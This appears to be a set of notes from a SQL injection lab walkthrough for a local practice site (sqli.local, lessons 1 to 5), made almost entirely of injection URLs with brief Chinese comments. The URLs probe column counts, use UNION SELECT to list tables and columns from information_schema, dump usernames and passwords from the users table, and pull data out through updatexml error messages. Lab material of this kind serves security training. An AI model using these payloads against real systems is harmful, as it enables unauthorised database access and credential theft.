1
http://sqli.local/Less-1?id=1' order by 3%23
2
http://sqli.local/Less-1?id=1' order by 4%23

1
http://sqli.local/Less-1/?id=-1' union select 1,database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema="security"%23

1
#对比两个结果
2
http://sqli.local/Less-2/?id=1
3
http://sqli.local/Less-2/?id=2-1

1
http://sqli.local/Less-2/?id=-1 union select 1,2,3

1
http://sqli.local/Less-2/?id=-1 union select 1,database(),version()%23

1
http://sqli.local/Less-2/?id=-1 union select 1,database(),table_name FROM information_schema.tables WHERE table_schema="security"%23

1
http://sqli.local/Less-2/?id=-1 union select 1,database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema="security"%23

1
http://sqli.local/Less-2/?id=-1 union select 1,database(),group_concat(column_name) FROM information_schema.columns WHERE table_schema="security" and table_name="emails"%23
2
http://sqli.local/Less-2/?id=-1 union select 1,database(),group_concat(column_name) FROM information_schema.columns WHERE table_schema="security" and table_name="referers"%23
3
http://sqli.local/Less-2/?id=-1 union select 1,database(),group_concat(column_name) FROM information_schema.columns WHERE table_schema="security" and table_name="usagents"%23
4
http://sqli.local/Less-2/?id=-1 union select 1,database(),group_concat(column_name) FROM information_schema.columns WHERE table_schema="security" and table_name="users"%23

1
http://sqli.local/Less-2/?id=-1 union select 1,database(),group_concat(concat_ws("-",id,username,password)) FROM security.users

1
# 闭合方式变为')
2
http://sqli.local/Less-2/?id=-1')

1
http://sqli.local/Less-4/?id=-1")

1
http://sqli.local/Less-5/?id=1' # 报错
2
http://sqli.local/Less-5/?id=1" # 没有报错

1
http://sqli.local/Less-5/?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)%23